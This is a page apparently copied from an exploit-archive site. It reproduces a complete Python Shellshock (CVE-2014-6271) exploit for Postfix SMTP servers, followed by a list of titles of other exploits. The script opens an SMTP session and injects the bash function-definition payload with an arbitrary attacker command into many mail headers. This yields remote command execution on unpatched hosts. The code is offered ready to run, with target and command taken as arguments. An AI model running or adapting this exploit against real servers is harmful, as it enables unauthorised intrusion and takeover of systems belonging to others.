Apache mod_cgi – Remote Exploit (Shellshock)
All posts by Nerdy Support
[remote] – Postfix SMTP – Shellshock Exploit
Postfix SMTP – Shellshock Exploit
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
from socket import *
import sys
def usage():
print "shellshock_smtp.py "
argc = len(sys.argv)
if(argc < 3 or argc > 3):
usage()
sys.exit(0)
rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]
headers = ([
"To",
"References",
"Cc",
"Bcc",
"From",
"Subject",
"Date",
"Message-ID",
"Comments",
"Keywords",
"Resent-Date",
"Resent-From",
"Resent-Sender"
])
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))
# banner grab
s.recv(2048*4)
def netFormat(d):
d += "\n"
return d.encode('hex').decode('hex')
data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)
data = netFormat("rcpt to:")
s.send(data)
s.recv(2048*4)
data = netFormat("data")
s.send(data)
s.recv(2048*4)
data = ''
for h in headers:
data += netFormat(h + ":() { :; };" + cmd)
data += netFormat(cmd)
# .
data += "0d0a2e0d0a".decode('hex')
s.send(data)
s.recv(2048*4)
data = netFormat("quit")
s.send(data)
s.recv(2048*4)
[webapps] – Bash – CGI RCE (MSF) Shellshock Exploit
Bash – CGI RCE (MSF) Shellshock Exploit
[remote] – OpenVPN 2.2.29 – ShellShock Exploit
OpenVPN 2.2.29 – ShellShock Exploit
[papers] – Exploração de código remoto: uma técnica bastante eficaz
Exploração de código remoto: uma técnica bastante eficaz
[remote] – ManageEngine OpManager / Social IT Arbitrary File Upload
ManageEngine OpManager / Social IT Arbitrary File Upload
[remote] – HP Network Node Manager I PMD Buffer Overflow
HP Network Node Manager I PMD Buffer Overflow
[webapps] – Moab < 7.2.9 – Authorization Bypass
Moab
[webapps] – Epicor Enterprise 7.4 – Multiple Vulnerabilities
Epicor Enterprise 7.4 – Multiple Vulnerabilities